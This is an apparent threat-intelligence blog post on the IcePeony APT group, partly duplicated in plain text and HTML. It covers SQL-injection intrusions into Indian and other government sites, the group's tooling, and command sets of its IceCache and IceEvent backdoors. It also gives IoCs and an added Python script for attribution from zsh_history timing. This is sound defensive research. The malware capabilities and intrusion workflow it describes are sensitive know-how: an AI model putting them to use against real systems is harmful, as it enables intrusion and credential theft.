SOCKS_CONNECT | Command to indicate a connection request with the SOCKS protocol
SOCKS_DISCONNECT | Command to indicate disconnection with the SOCKS protocol
SOCKS_READ | Command that directs reading of data in the SOCKS protocol
SOCKS_FORWARD | Command to instruct data transfer via the SOCKS protocol
PROXY_ADD | Command to add a proxy
PROXY_LIST | Command to list proxies
PROXY_DEL | Command to delete a proxy
PROXY_CLEAR | Command to clear all proxy settings
FILE_UPLOAD / FILE_UPLOAD_PRO | Upload files
FILE_DOWNLOAD / FILE_DOWNLOAD_PRO | Download files
IIS_VERSION | Show IIS version

These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compile time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has changed over time.
This shows that the malware’s developers have made improvements while continuing their intrusion operations.

sha256[:8] | Compile Time | First Submission | Submitter | Cmd Num | X-Token | TYPE
--- | --- | --- | --- | --- | --- | ---
5b16d153 | 2024-07-17 09:11:14 | 2024-08-03 04:58:20 | c8d0b2b9 (ID) | 20 | tn7rM2851XVvOFbc | B
484e2740 | 2024-06-21 03:05:15 | 2024-08-07 09:25:53 | 39d4d6d2 - email | 20 | tn7rM2851XVvOFbc | B
11e90e24 | 2024-06-05 03:52:48 | 2024-06-18 12:21:50 | d9cb313c (ID) | 20 | tn7rM2851XVvOFbc | B
b8d030ed | 2024-06-05 03:52:41 | 2024-06-18 10:47:18 | 408f1927 (ID) | 20 | tn7rM2851XVvOFbc | B
ceb47274 | 2024-04-25 09:53:26 | 2024-08-02 21:50:50 | 06ac9f47 (BR) | 20 | tn7rM2851XVvOFbc | B
d1955169 | 2024-04-21 11:29:25 | 2024-06-18 12:24:39 | d9cb313c (ID) | 18 | tn7rM2851XVvOFbc | B
de8f58f0 | 2024-04-21 11:29:10 | 2024-06-18 10:49:53 | 408f1927 (ID) | 18 | tn7rM2851XVvOFbc | B
535586af | 2024-03-27 05:08:50 | 2024-04-19 07:57:19 | c2440bbf (ID) | 18 | tn7rM2851XVvOFbc | B
0b8b10a2 | 2024-03-27 05:08:57 | 2024-04-18 13:54:16 | c2440bbf (ID) | 18 | tn7rM2851XVvOFbc | B
a66627cc | 2024-02-20 09:36:12 | 2024-03-12 15:17:55 | a6412166 (VN) | 16 | cbFOvVX1582Mr7nt | A
e5f520d9 | 2024-02-01 09:32:21 | 2024-07-17 09:30:54 | 24761b38 (SG) | 24 | cbFOvVX1582Mr7nt | A
3eb56218 | 2023-12-07 03:04:16 | 2024-02-20 13:54:02 | 0f09a1ae (ID) | 24 | cbFOvVX1582Mr7nt | A
5fd5e99f | 2023-09-27 00:50:46 | 2024-03-24 08:59:02 | Ca43fb0f (ID) | 24 | cbFOvVX1582Mr7nt | A
0eb60e4c | 2023-08-23 09:11:24 | 2023-10-18 10:11:00 | 0e8f2a34 (VN) | 18 | cbFOvVX1582Mr7nt | A

IceEvent

IceEvent is a simple passive-mode backdoor that is installed as a service.

PDB Path
C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb

Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India.
TYPE-A | Description
--- | ---
FILE: | Command to read files via sockets
CMD: | Command to execute a process

TYPE-B | Description
--- | ---
UPFILE | Upload files
DOWNFILE | Download files
CMD | Command to execute a process

sha256[:8] | Compile Time | First Submission | Submitter | Cmd Num | TYPE
--- | --- | --- | --- | --- | ---
80e83118 | 2024-04-25 09:50:58 | 2024-07-25 05:43:08 | INDIA (99003aca) | 3 | B
9aba997b | 2024-04-30 04:48:48 | 2024-06-14 05:46:49 | INDIA (060734bd) | 3 | B
9a0b0439 | 2024-04-25 09:50:58 | 2024-06-14 05:00:08 | INDIA (060734bd) | 3 | B
bc94da1a | 2023-08-23 08:52:46 | 2023-09-05 03:03:57 | INDIA (81f8b666) | 2 | A

Similarities

Based on code similarities with IceCache, we believe that IceEvent was developed because a simple passive backdoor was needed during intrusions. Both IceCache and IceEvent use the same XOR key to encode communication data, and the PDB information shows that the same developer created both malware families. This is the XOR-based encoding process used for communication data, which is identical in both. This is the command execution process, also identical in both. Since the function calls and branching are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly.

The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution.

Attribution

We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers.

Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday.
This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations.

By the way, have you heard of the term “996 working hour system”? The term originated in China’s IT industry, where long working hours are seen as a problem. It refers to working from 9 a.m. to 9 p.m., six days a week. Such hard working conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. https://en.wikipedia.org/wiki/996_working_hour_system

Next, there is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used.

IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, we found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog; it was not a well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, whereas IceCache has more commands added to it. https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo

Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon, what about Mauritius? Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently begun cooperating with India.
They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. https://www.mea.gov.in/newsdetail1.htm?12042/

We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted.

Wrap-Up

In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward.
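The Attribution section above derives the operator's working hours, time zone, and weekly rhythm from the timestamps in the exposed zsh_history file. The script below is an added example of that analysis written for this page; it is not nao_sec's code and uses no data from the actual host. It assumes the zsh EXTENDED_HISTORY record layout (": <start epoch>:<elapsed seconds>;<command>", with multi-line commands continued by a trailing backslash), a working-hours window of 08:00 to 22:00 local time as the scoring heuristic for candidate UTC offsets (an assumption chosen for the example, not a value from the post), and a constructed sample history of benign commands.

```python
"""Activity-hours analysis of a zsh EXTENDED_HISTORY file (added example)."""
from __future__ import annotations

import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# One EXTENDED_HISTORY record: ": <start epoch>:<elapsed seconds>;<command>"
RECORD_RE = re.compile(r"^: (\d+):(\d+);(.*)$", re.S)
# Local working-hours window used by the offset heuristic (assumption).
WORK_START, WORK_END = 8, 22


def parse_zsh_history(text: str) -> list[tuple[datetime, int, str]]:
    """Return (start time in UTC, elapsed seconds, command) for each record.

    zsh stores multi-line commands with a trailing backslash on every line
    but the last, so such lines are joined before matching the record pattern.
    """
    records: list[tuple[datetime, int, str]] = []
    buf: str | None = None
    for line in text.splitlines():
        buf = line if buf is None else buf + "\n" + line
        if buf.endswith("\\"):
            continue                      # command continues on the next line
        m = RECORD_RE.match(buf)
        buf = None
        if m is None:
            continue                      # not an extended-format record; skip
        start = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
        records.append((start, int(m.group(2)), m.group(3)))
    return records


def activity_profile(records, utc_offset_hours: int):
    """Count commands per local hour of day and per weekday for one UTC offset."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    by_hour: Counter[int] = Counter()
    by_weekday: Counter[str] = Counter()
    for start, _elapsed, _cmd in records:
        local = start.astimezone(tz)
        by_hour[local.hour] += 1
        by_weekday[local.strftime("%a")] += 1
    return by_hour, by_weekday


def working_window(by_hour: Counter) -> tuple[int, int]:
    """Earliest and latest local hour that shows any activity."""
    hours = sorted(by_hour)
    return hours[0], hours[-1]


def likely_utc_offsets(records) -> list[int]:
    """Offsets (UTC-12..UTC+14) that put the most commands inside the work window.

    Heuristic: a human operator's commands cluster in waking hours, so the
    offset that fits best is a candidate for their time zone. Ties are
    returned together instead of being guessed at.
    """
    scores = {}
    for off in range(-12, 15):
        by_hour, _ = activity_profile(records, off)
        scores[off] = sum(n for h, n in by_hour.items() if WORK_START <= h < WORK_END)
    best = max(scores.values())
    return sorted(off for off, s in scores.items() if s == best)


def _rec(local_ts: str, cmd: str, utc_offset_hours: int = 8) -> str:
    """Build one record from a local wall-clock time (sample data only)."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    t = datetime.strptime(local_ts, "%Y-%m-%d %H:%M").replace(tzinfo=tz)
    return f": {int(t.timestamp())}:0;{cmd}"


# Constructed sample: benign commands at UTC+8 wall-clock times over one week
# (2024-07-01 is a Monday) with nothing on Sunday. Not data from the post.
SAMPLE_HISTORY = "\n".join([
    _rec("2024-07-01 08:30", "ls -la"),
    _rec("2024-07-01 13:10", "cat notes.txt"),
    _rec("2024-07-01 21:50", "exit"),
    _rec("2024-07-02 09:05", "python3 report.py"),
    _rec("2024-07-02 18:20", "git status"),
    _rec("2024-07-03 10:00", "vim todo.md"),
    _rec("2024-07-04 11:15", "ls"),
    _rec("2024-07-05 09:40", "cat notes.txt"),
    _rec("2024-07-06 14:00", "git pull"),
    _rec("2024-07-08 08:10", 'for f in *.log; do \\\n  wc -l "$f"; \\\ndone'),
])


if __name__ == "__main__":
    recs = parse_zsh_history(SAMPLE_HISTORY)
    offsets = likely_utc_offsets(recs)
    by_hour, by_weekday = activity_profile(recs, offsets[0])
    print("records:", len(recs), "best offsets:", offsets)
    print("active hours:", working_window(by_hour), "by weekday:", dict(by_weekday))
```

On the sample, the offset heuristic singles out UTC+8, the active window is 08:00 to 21:00, and Sunday has no activity, which is the same shape of evidence the post reads from the real history. On a real file, treat the offset as a hypothesis to corroborate with other artifacts (file timestamps, server logs), since a shifted schedule or multiple operators can fit several offsets equally well, which is why ties are reported rather than collapsed.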
IoCs

IP
165[.]22.211.62
64[.]227.133.248
173[.]208.156.19
173[.]208.156.144
154[.]213.17.225
103[.]150.186.219
63[.]141.255.16
204[.]12.205.10
107[.]148.37.63
103[.]99.60.119
154[.]213.17.237
45[.]195.205.88
154[.]213.17.244
103[.]99.60.93
149[.]115.231.17
149[.]115.231.39
103[.]99.60.108

Domain
d45qomwkl[.]online
k9ccin[.]com
k8ccyn[.]com
88k8cc[.]com
googlesvn[.]com

IceCache
484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f
5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811
ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b
e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b
d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950
11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63
de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c
b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681
535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd
0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd
5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46
3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c
a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6
0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77

IceEvent
80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58
9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e
9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea
bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b
    <p><img src="https://nao-sec.org/assets/2024-10-17/top.png" alt="" /></p> <p>This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present.</p> <p><a href="https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/">https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/</a></p> <h2 id="tldr">tl;dr</h2> <p>We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks.</p> <ul> <li>IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam.</li> <li>Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”.</li> <li>Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions.</li> </ul> <h2 id="icepeony">IcePeony</h2> <p>IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India.</p> <p>They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials.</p> <p>We believe IcePeony works for China’s national interests. 
It is possible that they prioritize China’s maritime strategy.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/1.png" alt="" /></p> <p>Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future.</p> <h2 id="opsec-fail">OPSEC fail</h2> <p>In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/2.png" width="60%" /></p> <p>One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack.</p> <p>Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/3.png" alt="" /></p> <p>The zsh_history was not the only interesting file. There were many others.</p> <p>For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information.</p> <p>Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/4.png" alt="" /></p> <h2 id="intrusion-timeline">Intrusion Timeline</h2> <p>We obtained two weeks’ worth of command history from the zsh_history. 
Let’s go through the events of each day.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/5.png" alt="" /></p> <p>On day-1, the attacker attempted SQL injections on several government websites. When an exploit succeeded, they installed a webshell or IceCache, establishing a foothold. On day-2, they reviewed the domain information of the compromised hosts and created accounts for further exploitation. On day-3, which was a Sunday, they performed no actions; it seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules, which we explain in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections against other government websites. On day-6, they used various tools, including IcePeony’s custom tool StaX and the Diamorphine rootkit. On day-7, they continued to attack other hosts with tools such as URLFinder and sqlmap.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/6.png" alt="" /></p> <p>On day-8, they used IceCache to steal information from the compromised environment, focusing in particular on domain users. On day-9, they were quiet and only performed connection checks. On day-10, a Sunday, they did nothing. On day-11, they used tools such as craXcel and WmiExec; craXcel is an open-source tool for unlocking password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and established persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation.</p> <p>Over the course of two weeks, the attacker used a variety of tools and commands to compromise government websites and exfiltrate information.</p> <h2 id="tools">Tools</h2> <p>IcePeony uses a wide range of tools, with a particular preference for open-source ones. 
Here, we highlight only the most distinctive tools they use.</p> <h3 id="stax">StaX</h3> <p>StaX is a customized variant of Stowaway, an open-source, high-performance proxy tool. The attacker extended Stowaway with custom processing; based on development strings, we call this version StaX.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/9.png" width="70%" /></p> <p>StaX adds encryption of the communication target specified in active mode, using a custom Base64 encoding and AES.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/7.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-10-17/8.png" alt="" /></p> <h3 id="proxychains">ProxyChains</h3> <p>ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/10.png" alt="" /></p> <p>info.sh is a script that collects system information from the compromised environment: environment information, user information, installed tool versions, network settings, SSH configuration files, and command history.</p> <p>linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the attacker’s server and creates backdoor users.</p> <p>Interestingly, they also installed Diamorphine, a Linux kernel-module rootkit that is publicly available on GitHub.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/11.png" alt="" /></p> <h2 id="malware">Malware</h2> <p>The IcePeony server contained malware targeting IIS, which we named IceCache. They deployed IceCache on the internet-facing IIS servers they had compromised. During the investigation, we also discovered a related malware, which we call IceEvent. No logs of IceEvent being used were found. 
We believe it was used to compromise another computer that was not connected to the internet.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/12.png" alt="" /></p> <h3 id="icecache">IceCache</h3> <p>IceCache has two components. The client is an ELF64 binary written in Go, customized from the open-source tunnelling tool reGeorg (more precisely its Go port, reGeorgGo, discussed under Attribution below). The server side is a native IIS module.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/13.png" width="60%" /></p> <p>To facilitate their intrusion operations, they added file transfer commands and command execution functionality.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/14.png" alt="" /></p> <p>The IceCache module is installed and run on IIS servers. The exact command set varies between samples, but the modules fall into two types according to the authentication token they expect (the X-Token column in the sample table below). Some samples retained PDB information, showing that they were built by a user named “power” in a project called “cachsess”.</p> <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb</td> </tr> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb</td> </tr> </tbody> </table> <p>The command set has changed over time, but it always includes command execution, SOCKS proxying, and file transfer.</p> <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Execute a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Request a new SOCKS connection</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Close a SOCKS connection</td> </tr> <tr> <td>SOCKS_READ</td> <td>Read data from a SOCKS connection</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Forward data over a SOCKS connection</td> </tr> <tr> 
<td>PROXY_ADD</td> <td>Add a proxy rule</td> </tr> <tr> <td>PROXY_LIST</td> <td>List proxy rules</td> </tr> <tr> <td>PROXY_DEL</td> <td>Delete a proxy rule</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Clear all proxy rules</td> </tr> <tr> <td>PROXY_SET_JS</td> <td>Set the JavaScript</td> </tr> <tr> <td>PROXY_GET_JS</td> <td>Get the configured JavaScript</td> </tr> <tr> <td>PROXY_ALLOW_PC</td> <td>Configure which clients (PCs) are allowed</td> </tr> <tr> <td>PROXY_CACHE_CLEAR</td> <td>Clear the proxy cache</td> </tr> <tr> <td>PROXY_CACHE_TIME</td> <td>Set the proxy cache lifetime</td> </tr> <tr> <td>FILE_UPLOAD</td> <td>Upload a file</td> </tr> <tr> <td>FILE_DOWNLOAD</td> <td>Download a file</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Execute a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Request a new SOCKS connection</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Close a SOCKS connection</td> </tr> <tr> <td>SOCKS_READ</td> <td>Read data from a SOCKS connection</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Forward data over a SOCKS connection</td> </tr> <tr> <td>PROXY_ADD</td> <td>Add a proxy rule</td> </tr> <tr> <td>PROXY_LIST</td> <td>List proxy rules</td> </tr> <tr> <td>PROXY_DEL</td> <td>Delete a proxy rule</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Clear all proxy rules</td> </tr> <tr> <td>FILE_UPLOAD / FILE_UPLOAD_PRO</td> <td>Upload a file</td> </tr> <tr> <td>FILE_DOWNLOAD / FILE_DOWNLOAD_PRO</td> <td>Download a file</td> </tr> <tr> <td>IIS_VERSION</td> <td>Report the IIS version</td> </tr> </tbody> </table> <p>These are the IceCache modules found so far. 
The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October 2023. Since the compile times and first-submission dates are consistent with each other, we believe the compile timestamps are reliable.</p> <p>Many new samples have been found since 2024. Most of the submitters are from India, which matches the victim information we gathered from the open-directory data.</p> <p>The number of commands has changed over time, which shows that the malware’s developers kept improving it while continuing their intrusion operations.</p> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>X-Token</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>5b16d153</td> <td>2024-07-17 09:11:14</td> <td>2024-08-03 04:58:20</td> <td>c8d0b2b9 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>484e2740</td> <td>2024-06-21 03:05:15</td> <td>2024-08-07 09:25:53</td> <td>39d4d6d2 - email</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>11e90e24</td> <td>2024-06-05 03:52:48</td> <td>2024-06-18 12:21:50</td> <td>d9cb313c (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>b8d030ed</td> <td>2024-06-05 03:52:41</td> <td>2024-06-18 10:47:18</td> <td>408f1927 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>ceb47274</td> <td>2024-04-25 09:53:26</td> <td>2024-08-02 21:50:50</td> <td>06ac9f47 (BR)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>d1955169</td> <td>2024-04-21 11:29:25</td> <td>2024-06-18 12:24:39</td> <td>d9cb313c (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>de8f58f0</td> <td>2024-04-21 11:29:10</td> <td>2024-06-18 10:49:53</td> <td>408f1927 (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>535586af</td> <td>2024-03-27 05:08:50</td> <td>2024-04-19 07:57:19</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> 
</tr> <tr> <td>0b8b10a2</td> <td>2024-03-27 05:08:57</td> <td>2024-04-18 13:54:16</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>a66627cc</td> <td>2024-02-20 09:36:12</td> <td>2024-03-12 15:17:55</td> <td>a6412166 (VN)</td> <td>16</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>e5f520d9</td> <td>2024-02-01 09:32:21</td> <td>2024-07-17 09:30:54</td> <td>24761b38 (SG)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>3eb56218</td> <td>2023-12-07 03:04:16</td> <td>2024-02-20 13:54:02</td> <td>0f09a1ae (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>5fd5e99f</td> <td>2023-09-27 00:50:46</td> <td>2024-03-24 08:59:02</td> <td>Ca43fb0f (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>0eb60e4c</td> <td>2023-08-23 09:11:24</td> <td>2023-10-18 10:11:00</td> <td>0e8f2a34 (VN)</td> <td>18</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> </tbody> </table> <h3 id="iceevent">IceEvent</h3> <p>IceEvent is a simple passive-mode backdoor that is installed as a service.</p> <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb</td> </tr> </tbody> </table> <p>Two types have been identified based on the command format. Both types implement only the minimum necessary commands. The older type was first submitted in September 2023, and several newer samples of the second type appeared in April 2024. 
All of these were submitted from India.</p> <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>FILE:</td> <td>Read a file over the socket</td> </tr> <tr> <td>CMD:</td> <td>Execute a process</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>UPFILE</td> <td>Upload a file</td> </tr> <tr> <td>DOWNFILE</td> <td>Download a file</td> </tr> <tr> <td>CMD</td> <td>Execute a process</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>80e83118</td> <td>2024-04-25 09:50:58</td> <td>2024-07-25 05:43:08</td> <td>INDIA (99003aca)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9aba997b</td> <td>2024-04-30 04:48:48</td> <td>2024-06-14 05:46:49</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9a0b0439</td> <td>2024-04-25 09:50:58</td> <td>2024-06-14 05:00:08</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>bc94da1a</td> <td>2023-08-23 08:52:46</td> <td>2023-09-05 03:03:57</td> <td>INDIA (81f8b666)</td> <td>2</td> <td>A</td> </tr> </tbody> </table> <h3 id="similarities">Similarities</h3> <p>Based on code similarities with IceCache, we believe IceEvent was developed because a simple passive backdoor was needed during intrusions. Both IceCache and IceEvent use the same XOR key to encode their communication data, and the PDB information shows that the same developer built both.</p> <p>This is the XOR-based encoding routine applied to communication data; it is identical in both malware families.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/15.png" alt="" /></p> <p>This is the command execution routine, which is likewise identical in both. 
Since the function calls and branching are exactly the same, we believe they were compiled from the same source code. The other commands also match perfectly.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/16.png" alt="" /></p> <p>The communication data of IceCache and IceEvent is only encoded with the XOR routine described above, so it is easy to decode. Here is an example of decoding the data exchanged during command execution.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/17.png" alt="" /></p> <h2 id="attribution">Attribution</h2> <p>We investigated the attacker’s activity times based on the timestamps in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., a 14-hour workday. They are remarkably diligent workers.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/18.png" alt="" /></p> <p>Similarly, we investigated how activity changes with the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This suggests that the attackers are not conducting these attacks as a personal activity, but as part of organized, professional operations.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/19.png" alt="" /></p> <p>By the way, have you heard of the term “996 working hour system”? The term originated in China’s IT industry, where long working hours are seen as a problem. It refers to working from 9 a.m. to 9 p.m., six days a week. Such working conditions are called the “996 working hour system”. 
